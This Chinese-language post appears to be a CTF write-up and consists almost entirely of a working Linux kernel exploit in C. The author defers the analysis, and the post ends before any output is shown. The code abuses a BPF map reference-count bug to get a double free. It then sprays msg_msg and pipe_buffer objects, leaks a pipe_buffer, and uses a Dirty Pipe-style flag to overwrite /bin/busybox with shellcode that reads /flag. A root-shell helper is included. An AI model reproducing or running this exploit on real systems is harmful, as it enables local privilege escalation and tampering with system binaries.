漏洞分析与利用

分析后面看情况吧，有时间再写吧，先贴个利用脚本：

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/bpf.h>
#include <sys/prctl.h>
//#include <linux/if_packet.h>
//#include "./bpf_insn.h"void err_exit(char *msg)
{perror(msg);sleep(2);exit(EXIT_FAILURE);
}void info(char *msg)
{printf("\033[35m\033[1m[+] %s\n\033[0m", msg);
}void hexx(char *msg, size_t value)
{printf("\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}void binary_dump(char *desc, void *addr, int len) {uint64_t *buf64 = (uint64_t *) addr;uint8_t *buf8 = (uint8_t *) addr;if (desc != NULL) {printf("\033[33m[*] %s:\n\033[0m", desc);}for (int i = 0; i < len / 8; i += 4) {printf("  %04x", i * 8);for (int j = 0; j < 4; j++) {i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");}printf("   ");for (int j = 0; j < 32 && j + i * 8 < len; j++) {printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');}puts("");}
}/* root checker and shell poper */
void get_root_shell(void)
{if(getuid()) {puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");sleep(2);exit(EXIT_FAILURE);}puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");system("/bin/sh");/* to exit the process normally, instead of segmentation fault */exit(EXIT_SUCCESS);
}/* bind the process to specific core */
void bind_core(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}static inline int bpf(int cmd, union bpf_attr *attr)
{return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,unsigned int value_size, unsigned int max_entries)
{union bpf_attr attr = {.map_type = map_type,.key_size = key_size,.value_size = value_size,.max_entries = max_entries,};return bpf(BPF_MAP_CREATE, &attr);
}int create_bpf_array_of_map(int fd, int key_size, int value_size, int max_entries) {union bpf_attr attr = {.map_type = BPF_MAP_TYPE_ARRAY_OF_MAPS,.key_size = key_size,.value_size = value_size,.max_entries = max_entries,
//        .map_flags = BPF_F_MMAPABLE,.inner_map_fd = fd,};int map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));if (map_fd < 0) {return -1;}return map_fd;
}static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,.value = (uint64_t)value,};return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,.value = (uint64_t)value,.flags = flags,};return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,};return bpf(BPF_MAP_DELETE_ELEM, &attr);
}static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,.next_key = (uint64_t)next_key,};return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{struct bpf_map_info info;union bpf_attr attr = {.info.bpf_fd = map_fd,.info.info_len = sizeof(info),.info.info = (uint64_t)&info,};bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);return info.btf_id;
}void init() {setbuf(stdin, NULL);setbuf(stdout, NULL);setbuf(stderr, NULL);
}int trigger(int map_fd) {union bpf_attr attr = {.map_fd = map_fd,};return bpf(37, &attr);
}int key_alloc(char *description, char *payload, size_t plen)
{return syscall(__NR_add_key, "user", description, payload, plen, KEY_SPEC_PROCESS_KEYRING);
}int key_update(int keyid, char *payload, size_t plen)
{return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}int key_read(int keyid, char *buffer, size_t buflen)
{return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}int key_revoke(int keyid)
{return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}int key_unlink(int keyid)
{return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}struct msg_buf {long mtype;char mtext[1];
};struct msg_header {void* l_next;void* l_prev;long m_type;size_t m_ts;void* next;void* security;
};struct pipe_buffer {uint64_t page; // 存放数据的页框unsigned int offset, len; // 数据的偏移和大小uint64_t ops; // 操作该 buffer 的函数表unsigned int flags; // 标志unsigned long private; // 私有数据
};#define ATTACK_FILE "/bin/busybox"
int main(int argc, char** argv, char** envp)
{init();bind_core(0);int res = 0;char desc[0x10] = { 0 };char buffer[0x1000] = { 0 };char msg_buffer[0x2000] = { 0 };struct msg_buf* msg_buf = (struct msg_buf*)msg_buffer;struct pipe_buffer pipe_buffer_data;#define SPRAY_PIPE_NUMS 0x10int file_fd[SPRAY_PIPE_NUMS];for (int i = 0; i < SPRAY_PIPE_NUMS; i++) {file_fd[i] = open(ATTACK_FILE, O_RDONLY);if (file_fd[i] < 0) err_exit("Failed to open" ATTACK_FILE);}int pipe_fd[SPRAY_PIPE_NUMS][2];for (int i = 0; i < SPRAY_PIPE_NUMS; i++) {pipe(pipe_fd[i]);//	write(pipe_fd[i][1], "XiaozaYa", 8);//	write(pipe_fd[i][1], "BBBBBBBB", 8);loff_t offset = i;if (splice(file_fd[i], &offset, pipe_fd[i][1], NULL, 1, 0) <= 0)err_exit("Failed to exec splice system call");}int qid = msgget(IPC_PRIVATE, 0666|IPC_CREAT);if (qid < 0) err_exit("Failed to exec msgget");int key = 0;prctl(PR_SET_NAME, "XiaozaYa");int inner_map = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, 4, 10);if (inner_map < 0) err_exit("Failed to bpf_map_create for inner_map");printf("[+] inner_map: %d\n", inner_map);int outer_map = create_bpf_array_of_map(inner_map, 4, 4, 10);if (outer_map < 0) err_exit("Failed to bpf_map_create for outer_map");printf("[+] outer_map: %d\n", outer_map);puts("[+] set inner_map.ref = 2");if (bpf_map_update_elem(outer_map, &key, &inner_map, BPF_ANY) < 0)err_exit("Failed to bpf_map_update_elem");
//	puts("[+] bpf_map_update_elem successfully");puts("[+] BUG set inner_map.ref = 1");trigger(inner_map);puts("[+] close outer_map to free inner_mmap's bpf_map object");// frist free bpf_mapclose(outer_map);puts("[+] try to close inner_map");// double free bpf_map	trigger(inner_map);close(inner_map);puts("[+] spray msg_msg to occupy bpf_map chunk");msg_buf->mtype = 1;memset(msg_buf->mtext, 'A', 512);*(char*)(((char*)msg_buf->mtext) +0xc8+8) = 0x30;if (msgsnd(qid, msg_buf, 0x100-0x30+1, 0) < 0)err_exit("Failed to exec msgsnd");msg_buf->mtype = 2;if (msgsnd(qid, msg_buf, 0x100-0x30+1, 0) < 0)err_exit("Failed to exec msgsnd");//	getchar();puts("[+] spray pipe_buffer to occupy bpf_map chunk again");for (int i = 0; i < SPRAY_PIPE_NUMS; i++) {if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 *8) < 0)err_exit("Failed to exec fcntl");}
//	getchar();memset(buffer, '\x00', sizeof(buffer));if(msgrcv(qid, buffer, 0x100, 2, 0) < 0)err_exit("msgrcv");{uint64_t* addr = buffer +8;if (addr[0] == 0x4141414141414141) {	puts("[x] Failed to leak pipe_buffer");exit(-1);}elsememcpy(&pipe_buffer_data, addr, sizeof(pipe_buffer_data));}binary_dump("pipe_buffer data", &pipe_buffer_data, sizeof(pipe_buffer_data));pipe_buffer_data.flags = 0x10;pipe_buffer_data.offset = 0;memset(msg_buf->mtext, '\x00', 512);memcpy(msg_buf->mtext, &pipe_buffer_data, sizeof(pipe_buffer_data));for (int i = 0; i < 0x10; i++) {msg_buf->mtype = 3+i;if (msgsnd(qid, msg_buf, 512-0x30, 0) < 0)err_exit("Failed to exec msgsnd");}unsigned char elfcode[] = {/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x48, 0xb8,0x2f, 0x66, 0x6c, 0x61, 0x67, 0x00, 0x00, 0x00, 0x50, 0x6a, 0x02, 0x58,0x48, 0x89, 0xe7, 0x31, 0xf6, 0x0f, 0x05, 0x41, 0xba, 0xff, 0xff, 0xff,0x7f, 0x48, 0x89, 0xc6, 0x6a, 0x28, 0x58, 0x6a, 0x01, 0x5f, 0x99, 0x0f,0x05, 0xeb};sleep(1);for (int i = 0; i < SPRAY_PIPE_NUMS; i++) {write(pipe_fd[i][1], elfcode, sizeof(elfcode));}return 0;
}

远程效果如下：